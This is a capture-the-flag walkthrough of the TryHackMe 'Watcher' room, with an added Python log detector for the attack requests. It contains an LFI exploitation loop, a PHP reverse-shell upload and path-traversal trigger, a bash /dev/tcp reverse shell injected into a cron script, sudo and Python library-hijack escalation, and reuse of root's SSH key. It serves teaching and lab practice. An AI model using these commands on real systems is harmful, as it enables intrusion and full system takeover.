Watcher — TryHackMe [Creator — rushisec]

jaeng
5 min read, Feb 24, 2021

Before starting: all of the challenges posted here are part of my learning journey. I didn’t solve them all on my own; wherever I searched or learned from other senpais, I will reference them.

Ideas:

  • Recon with nmap and find the LFI vulnerability in “post.php?post=”
  • Create a one-line command to interact with the vulnerable parameter
  • Read secret_*.txt and find the password for ftpuser
  • LFI + VSFTPD -> RCE
  • Escalate to user toby
  • Shell as user mat
  • Shell as user will
  • Shell as root

# RECON

Starting with: nmap -sV -sC -A -vvv -T4 -oN nmap/output watcher.thm

There are three open ports. Normally, I would start with FTP to see if it allows anonymous login, which it did not in this case. Therefore, I moved on and had a look at the website running on port 80. Here are two interesting things that really caught my attention.

# FLAG 1

1. /robots.txt (This is the common location that everyone recommends checking first when coming to a website)

I found flag_1.txt.

and secret_file_do_not_read.txt.

I could not read it; keep that in mind, and we move on :).

2. /post.php?post=striped.php

Now, let’s throw a bunch of characters into the parameter to see if it’s vulnerable to SQL injection, SSRF or LFI.

It was vulnerable to LFI.

# FLAG 2

Up to now, I personally prefer to create a one-line bash command to automate repetitive work. (This is not necessary!):

lfi(){ while true; do read -p "payload> " lfi; curl -s "http://watcher.thm/post.php?post=php://filter/convert.base64-encode/resource=${lfi}" | cut -d$'\n' -f 70 | sed 's/<\/div>//' | tr -d '[:space:]' | base64 -d; done };lfi

Tried to log in as ftpuser:

flag_2.txt

# SHELL AS www-data & FLAG 3

The idea to get a reverse shell is: LFI + VSFTPD = RCE.

  • Upload a reverse shell to FTP.
  • Use the LFI vulnerability to trigger the reverse shell.

1. Upload a shell to FTP.

[ http://pentestmonkey.net/tools/web-shells/php-reverse-shell ]

2. Trigger the shell, for example with curl:

curl -s "http://watcher.thm/post.php?post=../../../../../../../home/ftpuser/ftp/files/sh.php"

flag_3.txt was stored in the /var/www/html/more_secrets_a9f10a directory.
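The requests used in this section and the previous one (the php://filter base64 read of post.php and the traversal to the uploaded sh.php) leave a clear trace in the web server’s access log. The following Python is an added example, not part of the original post or the room, that flags such requests in constructed Apache log lines; it also decodes the parameter a second time to catch double-encoded traversal, which goes beyond what the post shows.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample lines in Apache combined-log format, modelled on the
# requests this walkthrough sends to post.php (not real logs from the box).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Feb/2021:10:01:02 +0000] "GET /post.php?post=striped.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Feb/2021:10:02:15 +0000] "GET /post.php?post=php://filter/convert.base64-encode/resource=post.php HTTP/1.1" 200 5190 "-" "curl/7.68.0"
10.0.0.5 - - [24/Feb/2021:10:03:40 +0000] "GET /post.php?post=../../../../../../../home/ftpuser/ftp/files/sh.php HTTP/1.1" 200 12 "-" "curl/7.68.0"
10.0.0.5 - - [24/Feb/2021:10:05:01 +0000] "GET /post.php?post=..%252F..%252F..%252Fhome%252Fftpuser%252Fftp%252Ffiles%252Fsh.php HTTP/1.1" 200 12 "-" "curl/7.68.0"
10.0.0.9 - - [24/Feb/2021:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""

# Apache log: client IP first, then the request line "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Detection rules, each applied to the decoded value of the `post` parameter.
RULES = (
    ("php_wrapper", lambda v: v.lower().startswith("php://")),
    ("base64_filter", lambda v: "convert.base64-encode" in v.lower()),
    ("path_traversal", lambda v: "../" in v or "..\\" in v),
    ("absolute_path", lambda v: v.startswith("/")),
)


def suspicious_post_values(log_text):
    """Return [(client_ip, decoded_post_value, [matched_rule_names])] for every
    request to /post.php whose `post` parameter trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if url.path != "/post.php":
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("post", []):
            # parse_qs already decoded once; decode again so a double-encoded
            # payload (%252F -> %2F -> /) cannot slip past the string checks.
            value = unquote(raw)
            hits = [name for name, check in RULES if check(value)]
            if hits:
                findings.append((m.group("ip"), value, hits))
    return findings


if __name__ == "__main__":
    for ip, value, hits in suspicious_post_values(SAMPLE_LOG):
        print(f"{ip}  {','.join(hits):<28} {value}")
```

The benign striped.php request and the unrelated /index.php hit produce no finding, so the three flagged lines are exactly the wrapper read and the two traversal attempts.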

# SHELL AS USER toby & FLAG 4

Enumeration:

sudo -l (sudo -l, id, crontab -l, ls -al /home and a search for SUID binaries are some of the top commands for a quick win)

sudo -u toby /bin/bash

and flag_4.txt

# SHELL AS USER mat & FLAG 5

Enumeration:

There is a note.txt in toby’s home directory. Let’s have a look at it.

Mat left us a hint on how to escalate to his shell!

I had write permission on /home/toby/jobs/cow.sh. Now I can inject a reverse shell into this script and wait for it to execute.

[ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ]

echo "bash -c 'bash -i >& /dev/tcp/[YOUR_IP]/[YOUR_PORT] 0>&1'" > /home/toby/jobs/cow.sh

On the attacker box, set up a nc listener and wait for the reverse connection.

From there, we can easily find flag_5.txt.

# SHELL AS USER will & FLAG 6

Enumeration: user mat can run sudo … as user will.

Let’s have a look at the will_script.py to see what it does.

In summary, it takes our input and checks whether the input is in a whitelist, then exits if it isn’t or executes it if it is.

Let’s have a look at the other script, cmd.py. (Sorry, I messed up a little bit when I was on the box …)

For example, if our input is 2, executing the sudo command returns something like this.

Here, I have write permission on cmd.py, which means I can effectively control will_script.py, since it uses cmd.py as a library. This also means I can modify the code so that it executes before will_script.py validates my input.

Run the script again and get a shell as will.

# SHELL AS root & FLAG 7

User will belongs to the adm group, so we can use the find command to list all the files that belong to the adm group.

From the output, key.64 is root’s ssh private key encoded in base64; decode it and ssh into the box as root!

flag_7.txt

P.S.: Thanks for spending time reading this post. I’m new and still learning, so I’m happy to hear from you and welcome your contributions.
